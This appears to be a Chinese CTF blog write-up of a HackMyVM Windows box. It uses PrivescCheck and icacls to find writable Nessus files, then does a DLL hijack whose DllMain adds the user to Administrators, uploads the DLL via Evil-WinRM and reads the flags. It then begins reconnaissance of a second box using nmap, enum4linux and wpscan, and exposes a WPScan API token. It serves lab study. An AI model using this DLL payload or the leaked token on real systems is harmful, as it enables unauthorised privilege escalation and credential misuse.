? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether a whitelist of MSI packages is set in the      ?
? registry to disable UAC prompts, and whether they have       ?
? custom actions that may be leveraged for local privilege     ?
? escalation.                                                  ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.087


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Updates - Update History                          ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether a Windows security update was installed within ?
? the last 31 days.                                            ?
????????????????????????????????????????????????????????????????
WARNING: Failed to retrieve hotfix history.
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:05.749


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Misc - Process and Thread Permissions             ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the current user has any privileged access     ?
? right on a Process or Thread they do not own.                ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:01.457


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Misc - User Sessions                              ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Get information about the currently logged-on users. Note    ?
? that it might be possible to capture or relay the            ?
? NTLM/Kerberos authentication of these users (RemotePotato0,  ?
? KrbRelay).                                                   ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (nothing found) - Severity: None - Execution time: 00:00:00.043


????????????????????????????????????????????????????????????????
?                 ~~~ PrivescCheck Summary ~~~                 ?
????????????????????????????????????????????????????????????????
 TA0004 - Privilege Escalation
 - Services - Image File Permissions ▒ High
 TA0006 - Credential Access
 - Hardening - Credential Guard ▒ Low
 - Hardening - LSA Protection ▒ Low

WARNING: To get more info, run this script with the option '-Extended'.

发现了一处权限比较高C:\Program Files\Tenable\Nessus\nessus-service.exe，AllAccess是权限集合中的完全控制权限，覆盖所有其他基础权限（如读取、写入、执行等），允许用户或组对资源进行无限制操作，看一下：

*Evil-WinRM* PS C:\> cd "C:\Program Files\Tenable\Nessus\"
*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> dir


    Directory: C:\Program Files\Tenable\Nessus


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/18/2024  10:35 AM              1 .winperms
-a----          5/9/2024  11:30 PM        2471544 fips.dll
-a----          5/9/2024  11:30 PM        5217912 icudt73.dll
-a----          5/9/2024  11:30 PM        1575032 icuuc73.dll
-a----          5/9/2024  11:30 PM        4988536 legacy.dll
-a----          5/9/2024  11:06 PM         375266 License.rtf
-a----          5/9/2024  11:37 PM       11204728 nasl.exe
-a----          5/9/2024  11:31 PM         264824 ndbg.exe
-a----          5/9/2024  11:06 PM             46 Nessus Web Client.url
-a----          5/9/2024  11:33 PM          38520 nessus-service.exe
-a----          5/9/2024  11:37 PM       11143800 nessuscli.exe
-a----          5/9/2024  11:38 PM       11925624 nessusd.exe

发现存在一些dll文件，猜测可能存在劫持漏洞，看一下权限：

*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> icacls "C:\Program Files\Tenable\Nessus\*"
C:\Program Files\Tenable\Nessus\.winperms NT AUTHORITY\SYSTEM:(I)(F)
                                          BUILTIN\Administrators:(I)(F)
                                          BUILTIN\Users:(I)(RX)
                                          NESSUS\nesus:(I)(F)
                                          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                          APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

C:\Program Files\Tenable\Nessus\fips.dll NT AUTHORITY\SYSTEM:(I)(F)
                                         BUILTIN\Administrators:(I)(F)
                                         BUILTIN\Users:(I)(RX)
                                         NESSUS\nesus:(I)(F)
                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                         APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

C:\Program Files\Tenable\Nessus\icudt73.dll NT AUTHORITY\SYSTEM:(I)(F)
                                            BUILTIN\Administrators:(I)(F)
                                            BUILTIN\Users:(I)(RX)
                                            NESSUS\nesus:(I)(F)
                                            APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                            APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

C:\Program Files\Tenable\Nessus\icuuc73.dll NT AUTHORITY\SYSTEM:(I)(F)
                                            BUILTIN\Administrators:(I)(F)
                                            BUILTIN\Users:(I)(RX)
                                            NESSUS\nesus:(I)(F)
                                            APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                            APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

C:\Program Files\Tenable\Nessus\legacy.dll NT AUTHORITY\SYSTEM:(I)(F)
                                           BUILTIN\Administrators:(I)(F)
                                           BUILTIN\Users:(I)(RX)
                                           NESSUS\nesus:(I)(F)
                                           APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                           APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

C:\Program Files\Tenable\Nessus\License.rtf NT AUTHORITY\SYSTEM:(I)(F)
                                            BUILTIN\Administrators:(I)(F)
                                            BUILTIN\Users:(I)(RX)
                                            NESSUS\nesus:(I)(F)
                                            APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                            APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

C:\Program Files\Tenable\Nessus\nasl.exe NT AUTHORITY\SYSTEM:(I)(F)
                                         BUILTIN\Administrators:(I)(F)
                                         BUILTIN\Users:(I)(RX)
                                         NESSUS\nesus:(I)(F)
                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                         APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

C:\Program Files\Tenable\Nessus\ndbg.exe NT AUTHORITY\SYSTEM:(I)(F)
                                         BUILTIN\Administrators:(I)(F)
                                         BUILTIN\Users:(I)(RX)
                                         NESSUS\nesus:(I)(F)
                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                         APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

C:\Program Files\Tenable\Nessus\Nessus Web Client.url NT AUTHORITY\SYSTEM:(I)(F)
                                                      BUILTIN\Administrators:(I)(F)
                                                      BUILTIN\Users:(I)(RX)
                                                      NESSUS\nesus:(I)(F)
                                                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                                      APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

C:\Program Files\Tenable\Nessus\nessus-service.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                   BUILTIN\Administrators:(I)(F)
                                                   BUILTIN\Users:(I)(RX)
                                                   NESSUS\nesus:(I)(F)
                                                   APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                                   APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

C:\Program Files\Tenable\Nessus\nessuscli.exe NT AUTHORITY\SYSTEM:(I)(F)
                                              BUILTIN\Administrators:(I)(F)
                                              BUILTIN\Users:(I)(RX)
                                              NESSUS\nesus:(I)(F)
                                              APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                              APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

C:\Program Files\Tenable\Nessus\nessusd.exe NT AUTHORITY\SYSTEM:(I)(F)
                                            BUILTIN\Administrators:(I)(F)
                                            BUILTIN\Users:(I)(RX)
                                            NESSUS\nesus:(I)(F)
                                            APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                            APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 12 files; Failed processing 0 files

符号	权限说明	对应操作
`F`	完全控制	读取、写入、执行、删除、修改属性
`M`	修改	写入、删除（需配合`F` ）
`RX`	读取和执行	查看内容、运行程序
`R`	只读	查看内容
`W`	写入	修改内容（需目录权限）
`D`	删除	删除文件或子目录

**F**：完全控制（Full Control）：包含所有权限（读取、写入、执行、删除、修改属性等），可完全控制文件或目录。

dll劫持

在网上找了一个dll的劫持脚本，尝试进行利用：https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html

也可参考：https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html?highlight=windows%20dll#dll-search-order

/*
DLL hijacking example
author: @cocomelonc
*/

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call)  {
    case DLL_PROCESS_ATTACH:
      system("cmd.exe /k net localgroup administrators nesus /add");
      break;
    case DLL_PROCESS_DETACH:
      break;
    case DLL_THREAD_ATTACH:
      break;
    case DLL_THREAD_DETACH:
      break;
    }
    return TRUE;
}

进行编译再上传

┌──(kali㉿kali)-[~/temp/Nessus]
└─$ x86_64-w64-mingw32-gcc exp.c -shared -o legacy.dll

`-shared`

这个参数表示：

生成“共享库”，而不是可执行文件（.exe）

在 Windows 里：

-shared ⇒ 生成 .dll
不加 -shared ⇒ 默认生成 .exe

*Evil-WinRM* PS C:\Users\nesus\Documents> cd "C:\Program Files\Tenable\Nessus"
*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> dir


    Directory: C:\Program Files\Tenable\Nessus


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/18/2024  10:35 AM              1 .winperms
-a----          5/9/2024  11:30 PM        2471544 fips.dll
-a----          5/9/2024  11:30 PM        5217912 icudt73.dll
-a----          5/9/2024  11:30 PM        1575032 icuuc73.dll
-a----          5/9/2024  11:30 PM        4988536 legacy.dll
-a----          5/9/2024  11:06 PM         375266 License.rtf
-a----          5/9/2024  11:37 PM       11204728 nasl.exe
-a----          5/9/2024  11:31 PM         264824 ndbg.exe
-a----          5/9/2024  11:06 PM             46 Nessus Web Client.url
-a----          5/9/2024  11:33 PM          38520 nessus-service.exe
-a----          5/9/2024  11:37 PM       11143800 nessuscli.exe
-a----          5/9/2024  11:38 PM       11925624 nessusd.exe


*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> upload legacy.dll legacy.dll
                                        
Info: Uploading /home/kali/Desktop/hmv/legacy.dll to C:\Program Files\Tenable\Nessus\legacy.dll                     
                                        
Data: 115344 bytes of 115344 bytes copied
                                        
Info: Upload successful!

*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> .\nessus-service.exe

*Evil-WinRM* PS C:\users\Administrator> cd "C:\Program Files\Tenable\Nessus"
*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> mv legacy.dll legacy_beifen.dll
*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> upload legacy.dll legacy.dll
                                        
Info: Uploading /home/kali/Desktop/hmv/legacy.dll to C:\Program Files\Tenable\Nessus\legacy.dll                     
                                        
Data: 115344 bytes of 115344 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> .\nessus-service.exe
*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> cd c:/users/Administrator
*Evil-WinRM* PS C:\users\Administrator> type root.txt
Cannot find path 'C:\users\Administrator\root.txt' because it does not exist.
At line:1 char:1
+ type root.txt
+ ~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\users\Administrator\root.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand

尝试重启靶机，看一下是否成功修改：

┌──(kali㉿kali)-[~/temp/Nessus]
└─$ evil-winrm -i $IP -u nesus -p password
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nesus\Documents> cd "C:\Program Files\Tenable\Nessus"
*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> dir


    Directory: C:\Program Files\Tenable\Nessus


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/18/2024  10:35 AM              1 .winperms
-a----          5/9/2024  11:30 PM        2471544 fips.dll
-a----          5/9/2024  11:30 PM        5217912 icudt73.dll
-a----          5/9/2024  11:30 PM        1575032 icuuc73.dll
-a----          6/9/2025   8:48 AM          86510 legacy.dll
-a----          5/9/2024  11:30 PM        4988536 legacy_beifen.dll
-a----          5/9/2024  11:06 PM         375266 License.rtf
-a----          6/9/2025   8:21 AM         424096 Listdlls.exe
-a----          5/9/2024  11:37 PM       11204728 nasl.exe
-a----          5/9/2024  11:31 PM         264824 ndbg.exe
-a----          5/9/2024  11:06 PM             46 Nessus Web Client.url
-a----          5/9/2024  11:33 PM          38520 nessus-service.exe
-a----          5/9/2024  11:37 PM       11143800 nessuscli.exe
-a----          5/9/2024  11:38 PM       11925624 nessusd.exe


*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> whoami /all

USER INFORMATION
----------------

User Name    SID
============ ============================================
nessus\nesus S-1-5-21-2986980474-46765180-2505414164-1001


GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes
============================================================= ================ ============ ===============================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users                               Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                                          Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> cd c:/users/Administrator
*Evil-WinRM* PS C:\users\Administrator> cd desktop
*Evil-WinRM* PS C:\users\Administrator\desktop> dir


    Directory: C:\users\Administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/18/2024  12:11 PM             70 root.txt

*Evil-WinRM* PS C:\users\nesus\Desktop> type user.txt
72113f41d43e88eb5d67f732668bc3d1

*Evil-WinRM* PS C:\users\Administrator\desktop> type root.txt
b5fc5a4ebfc20cc18220a814e1aee0aa

关于验证哪些函数可用dll劫持

DLL Export Viewer 可用查看哪些函数可用，然后用于编写脚本进行劫持。

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/nessus/

HMV-TriplAdvisor

呼啸山庄 — Wed, 28 Jan 2026 00:00:00 GMT

信息收集

IP定位

┌──(web)─(root㉿kali)-[/home/kali]
└─# ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.108  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 fe80::cb0c:b9b1:dfd6:d4a5  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:3d:0e:65  txqueuelen 1000  (Ethernet)
        RX packets 196  bytes 20063 (19.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 535  bytes 33812 (33.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(web)─(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep 08:00:27

WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
192.168.0.102   08:00:27:70:a3:d3       (Unknown)

rustscan扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# rustscan -a 192.168.0.102 --ulimit 5000 -- -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.0.102:445
Open 192.168.0.102:5985
Open 192.168.0.102:8080
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.0.102
Depending on the complexity of the script, results may take some time to appear.

Completed ARP Ping Scan at 23:18, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:18
Completed Parallel DNS resolution of 1 host. at 23:18, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 23:18
Scanning 192.168.0.102 [3 ports]
Discovered open port 5985/tcp on 192.168.0.102
Discovered open port 8080/tcp on 192.168.0.102
Discovered open port 445/tcp on 192.168.0.102

PORT     STATE SERVICE       REASON          VERSION
445/tcp  open  microsoft-ds? syn-ack ttl 128
5985/tcp open  http          syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open  http          syn-ack ttl 128 Apache httpd
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Unknown favicon MD5: 3BD2EC61324AD4D27CB7B0F484CD4289
|_http-title: Did not follow redirect to http://tripladvisor:8080/wordpress/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
MAC Address: 08:00:27:70:A3:D3 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|phone
Running: Microsoft Windows 7|Phone
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows
OS details: Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/26%OT=445%CT=%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=
OS:69783CF3%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=I%II=I%SS=S%T
OS:S=7)OPS(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NNT11%O4=M5B4NW8ST11%O5=
OS:M5B4NW8ST11%O6=M5B4ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2
OS:000)ECN(R=Y%DF=Y%TG=80%W=2000%O=M5B4NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%TG=80%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)U1(R=N)IE(R=Y%DFI=N%TG=80%CD=Z)

Uptime guess: 0.005 days (since Mon Jan 26 23:12:46 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 23183/tcp): CLEAN (Timeout)
|   Check 2 (port 2137/tcp): CLEAN (Timeout)
|   Check 3 (port 12633/udp): CLEAN (Timeout)
|   Check 4 (port 42984/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2026-01-27T20:19:22
|_  start_date: 2026-01-27T20:13:04
|_clock-skew: 15h59m57s

开放端口总览

端口	服务	关键信息	价值
445	SMB	SMBv2，签名开启但非强制	⭐⭐⭐⭐
5985	WinRM	Microsoft HTTPAPI/2.0	⭐⭐⭐
8080	HTTP	Apache → WordPress 重定向	⭐⭐⭐⭐⭐

445 / SMB（重点之一）

你现在知道的

SMB2
Message signing enabled but not required

👉 这是好消息
意思是：

可以尝试 NTLM relay
可以尝试 匿名枚举
不是“铁板 SMB”

下一步必做

enum4linux -a 192.168.0.102

或更直接：

nmap -p445 --script smb-enum-shares,smb-enum-users,smb-os-discovery 192.168.0.102

目标是拿到：

用户名
共享
域 / 主机名

🧠 5985 / WinRM（潜在直接拿 Shell）

5985/tcp open  http  Microsoft HTTPAPI httpd 2.0

WinRM 的规则很简单：

有凭据 = 直接管理员 Shell

你现在缺的不是漏洞，是：

用户名
密码 / hash

一旦从 WordPress / SMB 拿到凭据，直接：

evil-winrm -i 192.168.0.102 -u USER -p PASS

或 hash：

evil-winrm -i 192.168.0.102 -u USER -H NTLM_HASH

🔥 8080 / Web（当前最优先）

核心信息

Apache httpd
Redirect → http://tripladvisor:8080/wordpress/

这句话 非常关键：

👉 这是一个 WordPress 站点
👉 还泄露了 主机名：tripladvisor

8080 端口的标准攻击流程（照着打）

1️⃣ 先修 hosts（否则 WP 扫描会坑你）

echo "192.168.0.102 tripladvisor" >> /etc/hosts

然后访问：

http://tripladvisor:8080/wordpress/

2️⃣ WordPress 指纹 + 用户枚举

wpscan --url http://tripladvisor:8080/wordpress/ --enumerate u,p,t

重点看：

👤 用户名
🔌 插件（是否有已知 CVE）

enum4linux

┌──(web)─(root㉿kali)-[/home/kali]
└─# enum4linux -a 192.168.0.102
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jan 27 03:07:46 2026

 =========================================( Target Information )=========================================

Target ........... 192.168.0.102
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.0.102 )===========================


[E] Can't find workgroup/domain



 ===============================( Nbtstat Information for 192.168.0.102 )===============================        
                                                        
Looking up status of 192.168.0.102                      
No reply from 192.168.0.102

 ===================================( Session Check on 192.168.0.102 )===================================       
                                                        
                                                        
[+] Server 192.168.0.102 allows sessions using username '', password ''                                         
                                                        
                                                        
 ================================( Getting domain SID for 192.168.0.102 )================================       
                                                        
do_cmd: Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED

[+] Can't determine if host is part of domain or part of a workgroup                                            
                                                        
                                                        
 ==================================( OS information on 192.168.0.102 )==================================        
                                                        
                                                        
[E] Can't get OS info with smbclient                    
                                                        
                                                        
[+] Got OS info for 192.168.0.102 from srvinfo:         
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED


 =======================================( Users on 192.168.0.102 )=======================================       
                                                        
                                                        
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED                                            
                                                        
                                                        

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED                                             
                                                        
                                                        
 =================================( Share Enumeration on 192.168.0.102 )=================================       
                                                        
do_connect: Connection to 192.168.0.102 failed (Error NT_STATUS_IO_TIMEOUT)

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.0.102           
                                                        
                                                        
 ===========================( Password Policy Information for 192.168.0.102 )===========================        
                                                        
ldapsea                                                 
[E] Unexpected error from polenum:                      
                                                        
                                                        

[+] Attaching to 192.168.0.102 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: [Errno Connection error (192.168.0.102:139)] timed out

[+] Trying protocol 445/SMB...

        [!] Protocol failed: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.



[E] Failed to get password policy with rpcclient        
                                                        
                                                        

 ======================================( Groups on 192.168.0.102 )======================================        
                                                        
                                                        
[+] Getting builtin groups:                             
                                                        
                                                        
[+]  Getting builtin group memberships:                 
                                                        
                                                        
[+]  Getting local groups:                              
                                                        
                                                        
[+]  Getting local group memberships:                   
                                                        
                                                        
[+]  Getting domain groups:                             
                                                        
                                                        
[+]  Getting domain group memberships:                  
                                                        
                                                        
 ==================( Users on 192.168.0.102 via RID cycling (RIDS: 500-550,1000-1050) )==================       
                                                        
                                                        
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.                                       
                                                        
                                                        
 ===============================( Getting printer info for 192.168.0.102 )===============================       
                                                        
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Tue Jan 27 03:08:42 2026

Wpscan

┌──(web)─(root㉿kali)-[/home/kali]
└─# echo "192.168.0.102 tripladvisor" >> /etc/hosts

扫描分俩段式

第一段：快，找入口

wpscan --url http://tripladvisor:8080/wordpress/ \
  -e u,vp \
  --plugins-detection mixed \
  --api-token "NEzNxgvCrcyIZN1aYoHxHyUda29vcAIcsbaCrFngLA0"

目的：

找 能打的插件
找用户
用时：几分钟

第二段：只对“命中插件”开 aggressive

wpscan --url http://tripladvisor:8080/wordpress/ \
  --plugins-detection aggressive \
  --plugins-list plugin1,plugin2,plugin3 \
  --api-token YOUR_TOKEN

参数	作用
`ep`	仅已知有漏洞的插件
`ap`	所有插件
`at`	所有主题
`tt`	时间线用户枚举
`cb`	配置备份文件
`dbe`	数据库导出
`--themes-detection aggressive`	主题也暴力
`--max-threads 5`	降速防封

扫描详情

太卡了太卡了太卡了太卡了！！！！！！

扫不了一点

wpscan --url http://tripladvisor:8080/wordpress/ \
  -e u,ap,at,tt,cb,dbe \
  --plugins-detection aggressive \
  --themes-detection aggressive \
  --api-token YOUR_TOKEN \

这条指令要扫三天

wpscan --url http://tripladvisor:8080/wordpress/ \
  -e u,vp \
  --plugins-detection mixed \
  --api-token "NEzNxgvCrcyIZN1aYoHxHyUda29vcAIcsbaCrFngLA0"

┌──(web)─(root㉿kali)-[/home/kali]
└─# wpscan --url http://tripladvisor:8080/wordpress/  --api-token "NEzNxgvCrcyIZN1aYoHxHyUda29vcAIcsbaCrFngLA0"
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://tripladvisor:8080/wordpress/ [192.168.0.102]
[+] Started: Tue Jan 27 03:53:05 2026

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://tripladvisor:8080/wordpress/xmlrpc.php
